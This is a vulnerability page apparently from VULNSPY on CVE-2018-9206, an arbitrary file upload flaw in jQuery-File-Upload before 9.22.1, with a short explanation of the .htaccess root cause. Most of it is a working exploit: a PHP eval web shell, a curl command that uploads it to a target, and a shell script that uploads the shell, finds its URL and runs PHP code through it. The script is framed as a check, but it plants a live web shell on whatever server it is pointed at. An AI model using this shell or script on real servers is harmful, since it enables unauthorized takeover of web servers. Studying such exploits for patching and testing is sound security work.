jQuery-File-Upload < v9.22.1 Remote Code Execution Vulnerability


jQuery-File-Upload (blueimp) is the second most starred jQuery project on GitHub, after the jQuery framework itself. Versions before 9.22.1 let an unauthenticated client upload arbitrary files, PHP included, through the plugin's bundled server-side handler (server/php/), and for at least three years attackers have abused this to plant web shells and take over vulnerable web servers. The flaw was tracked as CVE-2018-9206 once it was reported. The root cause is that the handler relied on an .htaccess file in the upload directory to stop uploaded files from being executed, while Apache has shipped with .htaccess processing disabled by default (AllowOverride None) since 2.3.9, so on a stock Apache that protection silently never applied. Version 9.22.1 fixes this by restricting the default accept_file_types to image extensions; any deployment that still accepts arbitrary extensions, or that runs an older copy, remains exploitable.

Exploit

File shell.php (a minimal web shell: it evaluates whatever PHP code arrives in request parameter "1", whether via GET, POST or cookie):

<?php
// Deliberately vulnerable by design: executes attacker-supplied PHP from parameter "1".
eval($_REQUEST[1]);
?>

Upload shell.php to the plugin's bundled PHP handler (the multipart field name files is the handler's default param_name; a successful upload is answered with a JSON document that includes the stored file's url, which is under server/php/files/ by default):

curl -F "files=@shell.php" http://target.vsplate.me/server/php/index.php
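To turn the two steps above into a repeatable check, the following POSIX shell script (an added example, not code from the VULNSPY page or from the jQuery-File-Upload project) writes the same shell.php, uploads it with the same curl call, reads the stored URL back out of the handler's JSON reply, and then executes a harmless echo through the shell. The target host, the default endpoint path server/php/index.php, the default field name files and the shape of the JSON reply are assumptions; the sample reply used in the comments is constructed.

```shell
#!/bin/sh
# Added example, not code from the VULNSPY page or the jQuery-File-Upload project.
# Assumptions: default endpoint server/php/index.php, default upload field "files",
# and a JSON reply of the (constructed) form
#   {"files":[{"name":"shell.php","url":"http:\/\/host\/server\/php\/files\/shell.php",...}]}
# PHP's json_encode escapes "/" as "\/", which extract_url undoes.
set -u

# Same payload as the page's shell.php: eval() whatever arrives in request parameter "1".
write_shell() {
    printf '<?php\neval($_REQUEST[1]);\n?>\n' > shell.php
}

# Pull the first "url" value out of the handler's JSON reply and unescape "\/".
# Prints nothing when the reply carries no url (e.g. an "error" entry instead).
extract_url() {
    printf '%s' "$1" | sed -n 's/.*"url":"\([^"]*\)".*/\1/p' | sed 's#\\/#/#g'
}

# Upload shell.php exactly as the page does and print the URL it was stored at.
upload_shell() {
    base="$1"
    reply=$(curl -s -F "files=@shell.php" "$base/server/php/index.php")
    extract_url "$reply"
}

# Send PHP code to the uploaded shell as POST parameter "1" and print its output.
run_php() {
    shell_url="$1"
    curl -s --data-urlencode "1=$2" "$shell_url"
}

# Vulnerability check: a target that both stores the .php file and executes it
# echoes "pwned" back. An install at or above 9.22.1 rejects the upload, since
# only image extensions are accepted by default, so no url comes back.
check_target() {
    write_shell
    url=$(upload_shell "$1")
    if [ -z "$url" ]; then
        echo "upload rejected (no url in reply): likely patched" >&2
        return 1
    fi
    out=$(run_php "$url" "echo 'pwned';")
    if [ "$out" = "pwned" ]; then
        echo "vulnerable: code executed at $url"
        return 0
    fi
    echo "stored at $url but not executed (.htaccess or handler config in effect)" >&2
    return 2
}

# Usage: sh check.sh http://target.vsplate.me
if [ $# -gt 0 ]; then
    check_target "$1"
fi
```

The three outcomes are kept apart on purpose: a rejected upload means the extension filter is doing its job, a stored-but-inert file means the web server (not the plugin) is stopping execution, and only the last case is the full remote code execution the page describes. Parsing the reply with sed rather than jq keeps the script dependency-free on a minimal pentest box.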

All rights reserved. © 2018 VULNSPY